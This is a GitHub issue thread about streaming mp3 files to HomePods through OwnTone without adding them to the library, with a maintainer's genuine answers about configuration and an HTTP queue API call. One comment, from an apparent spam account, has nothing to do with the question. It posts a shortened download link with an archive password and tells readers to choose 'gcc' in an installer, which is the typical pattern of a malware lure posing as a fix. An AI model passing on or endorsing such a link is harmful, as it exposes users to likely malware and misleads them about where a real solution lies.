### ISSUE TITLE
Stream file not in library (feature request)

### ISSUE THREAD

**Issue by flic** [owntone/owntone-server#1799]
Hi.

I wanted to use Owntone to stream TTS mp3 files to my HomePods, but as I understand it I have to add the file to the library before I can stream it? Is that a correct assumption, there's no way (using the API) to stream a file directly from the media volume without adding it to the library beforehand?

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by ejurgensen** [comment]
It's not clear to me how you want Owntone to access the files, but here's two possibilities:

If the files are located on a media volume that is mounted then you just change the `directories` config option to that path. No need to move the files.

If the files on the media volume are accesible via http you can also add non-library sources via the API like this:
`/api/queue/items/add?clear=true&playback=start&uris=http:%2F%2Fipaddress%2Fpath%2Fto%2Ffile.mp3`

**Comment by flic** [comment]
If the files are located in the media volume, do I need to do a library scan first before I can stream them? That's the part I got stuck on.

Hmm, HTTP might be an interesting option!

**Comment by ejurgensen** [comment]
> do I need to do a library scan first before I can stream them?

OwnTone will do the scan itself on startup. but see [this regarding detecting changes](https://owntone.github.io/owntone-server/library/#libraries-on-network-mounts).
